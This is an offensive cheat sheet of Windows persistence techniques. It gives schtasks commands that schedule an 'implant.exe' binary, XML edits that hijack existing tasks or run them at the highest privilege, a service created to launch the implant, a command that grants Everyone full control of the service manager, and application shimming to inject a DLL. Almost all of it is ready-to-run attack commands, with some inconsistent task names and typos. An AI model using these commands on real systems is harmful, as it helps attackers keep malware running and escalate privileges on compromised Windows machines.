# normal @ 09:00 daily
schtasks /create /tn "MyTask\go" /sc daily /st 09:00 /tr "C:\windows\tasks\implant.exe"
# normal @ every 15 minutes
schtasks /create /tn "MyTask\go" /sc minute /mo 15 /tr "C:\windows\tasks\implant.exe"
# normal @ every 3 hours between 9-5
schtasks /create /tn "MyTask\go" /sc hourly /mo 3 /st 09:00 /etu 17:00 /tr "C:\windows\tasks\implant.exe"
# query
schtasks /query /tn "MyTask\Go" /fo list /v
# run
schtasks /run /tn "MyTasks/Go"
# delete
schtasks /delete /tn "MyTasks/Go"
run in an elevated session, and modify the task. copy the xml schtasks:
schtasks /query /tn "MyTask\Go" /xml > task.xml
Within the <Principals></Principals> section add "<RunLevel>HighestAvailable</RunLevel>"delete the original task, and create using the following:
# delete
schtasks /delete /f /tn MyTask
# create new from xml
schtasks /create /tn MyTask /xml task.xml
# query
schtasks /query /tn MyTask /v /xml
Take Over Task/ multiple actions:
# get old task:
schtasks /query /tn "MyTask\Go" /xml > task.xml
# add to the <actions></actions> section in the XML file
<Exec>
<Command>C:\windows\tasks\implant.exe</command>
</Exec>
# delete the task
schtasks /delete /tn "MyTask" /f
# add task
schtasks /create /tn "MyTask" /xml task.xml
# check worked in Task to Run section for multiple actions if it worked
schtasks /query /tn "MyTask" /fo list /v
Service:
create new service:
# create new service
sc create SERVICE_NAME binpath="C:\Windows\Tasks\implant.exe" start=auto
# query
sc query SERVICE_NAME
# start
sc start SERVICE_NAME
This will fail, but will still execute. advised to create a new proper service:
sc.exe sdset scmanager D:(A;;KA;;;WD)
Application Shimming:
x86 is more powerful that x64 noe, so use 32-bit. Use compatability administrator (32-bit) on cmd run:
compatadmin.exe /x
Right click 'New Database > new' name anything, vednor = Microsoft, select a good windows 32-bit. Select InjectDLL on compatability fixes and point it to your compiled DLL. Click save